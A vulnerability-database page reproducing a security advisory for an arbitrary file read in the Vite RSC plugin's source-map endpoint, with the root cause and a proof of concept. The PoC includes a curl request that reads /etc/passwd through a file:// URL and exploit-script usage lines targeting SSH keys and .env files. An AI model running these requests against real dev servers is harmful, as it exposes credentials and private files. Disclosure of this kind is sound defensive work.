logo

Database

Lack of data validation - Path Traversal In @vitejs/plugin-rsc

Description

@vitejs/plugin-rsc has an Arbitrary File Read via /__vite_rsc_findSourceMapURL Endpoint

Summary

The /__vite_rsc_findSourceMapURL endpoint in @vitejs/plugin-rsc allows unauthenticated arbitrary file read during development mode. An attacker can read any file accessible to the Node.js process by sending a crafted HTTP request with a file:// URL in the filename query parameter.

Severity: High Attack Vector: Network
Privileges Required: None
Scope: Development mode only (vite dev)

Impact

Who Is Affected?

    All developers using @vitejs/plugin-rsc during development

    Projects running vite dev with the RSC plugin enabled

Attack Scenarios

    Network-Exposed Dev Servers:
    When developers run vite --host 0.0.0.0 (common for mobile testing), attackers on the same network can read files.

    XSS-Based Attacks: If the application has an XSS vulnerability, malicious JavaScript can fetch sensitive files and exfiltrate them.

    ~Malicious Dependencies: ~ A compromised npm package could include code that reads files during development.

    DNS Rebinding: (EDIT: This doesn't apply since https://github.com/vitejs/vite/pull/20222) An attacker could use DNS rebinding to access the localhost dev server from a malicious website.

What Can Be Leaked?

    Environment files (.env, .env.local, .env.production)

    SSH keys (~/.ssh/id_rsa, ~/.ssh/id_ed25519)

    Cloud credentials (~/.aws/credentials, ~/.config/gcloud/)

    Database passwords and API keys

    Source code from other projects

    System files (/etc/passwd, /etc/shadow if readable)

Details

Vulnerable Code Location

File: packages/plugin-rsc/src/plugins/find-source-map-url.ts
Lines: 49-61

The vulnerability exists in the findSourceMapURL function:

async function findSourceMapURL(
  server: ViteDevServer,
  filename: string,
  environmentName: string,
): Promise<object | undefined> {
  // this is likely server external (i.e. outside of Vite processing)
  if (filename.startsWith('file://')) {
    filename = fileURLToPath(filename)...

Root Cause

The endpoint:

    Accepts a user-controlled filename parameter from the query string (line 20)

    Checks if it starts with file:// (line 49)

    Converts it to a filesystem path using fileURLToPath() (line 50)

    Reads the file with fs.readFileSync() without any path validation (line 53)

    Returns the file contents in the JSON response (line 57)

No validation is performed to ensure the requested file is within the project directory or is a legitimate source file.

PoC

Quick Test (Single Command)

If you have a Vite dev server running with @vitejs/plugin-rsc, you can test immediately:

curl 'http://localhost:5173/__vite_rsc_findSourceMapURL?filename=file:///etc/passwd&environmentName=Server'

Expected output (file contents in sourcesContent):

{
  "version": 3,
  "sources": ["/etc/passwd"],
  "sourcesContent": ["root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/sbin:..."],
  "mappings": "AAAA;AACA;AACA;..."
}
Further details of PoC

Complete PoC with Docker

For a fully reproducible environment, I've prepared a complete PoC:

Step 1: Create a minimal vite.config.ts

import { defineConfig } from 'vite'
import react from '@vitejs/plugin-rsc'

export default defineConfig({
  plugins: [
    react({
      serverHandler: false,
    }),...

Step 2: Create package.json

{
  "name": "poc-vite-rsc-file-read",
  "version": "1.0.0",
  "private": true,
  "type": "module",
  "scripts": {
    "dev": "vite --host 0.0.0.0"
  },...

Step 3: Create minimal index.html and src/main.tsx

index.html:

<!DOCTYPE html>
<html>
  <body>
    <div id="root"></div>
    <script type="module" src="/src/main.tsx"></script>
  </body>
</html>

src/main.tsx:

import React from 'react'
import ReactDOM from 'react-dom/client'
ReactDOM.createRoot(document.getElementById('root')!).render(<div>PoC</div>)

Step 4: Start the server and exploit

# Install and start
pnpm install
pnpm dev

# In another terminal, exploit:
curl 'http://localhost:5173/__vite_rsc_findSourceMapURL?filename=file:///etc/passwd&environmentName=Server'

Python Exploit Script

For easier testing, here's a Python script:

#!/usr/bin/env python3
"""Exploit: Arbitrary File Read via /__vite_rsc_findSourceMapURL"""

import json
import sys
import urllib.request
import urllib.parse
...

Usage:

python3 exploit.py localhost 5173 /etc/passwd
python3 exploit.py localhost 5173 /root/.ssh/id_rsa
python3 exploit.py localhost 5173 /home/user/.env

Verified Exploitation Results

I tested this in a Docker container and successfully read:

File
Description

Example output from /etc/passwd:

root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
node:x:1000:1000::/home/node:/bin/sh

Example output from sensitive secrets file:

SECRET_API_KEY=sk-live-very-secret-key-12345
DB_PASSWORD=super_secret_password
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
Patched versions

Aliases

1. CVE-2025-681552. NVD-2025-681553. OSV-2025-681554. GHSA-g239-q96q-x4qm5. GCVE-2025-68155

References

1. https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-g239-q96q-x4qm2. https://github.com/facebook/react/pull/297083. https://github.com/facebook/react/pull/307414. https://github.com/vitejs/vite-plugin-react/commit/582fba0b9a52b13fcff6beaaa3bfbd532bc5359d

Does your application use this vulnerable software?

During the free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.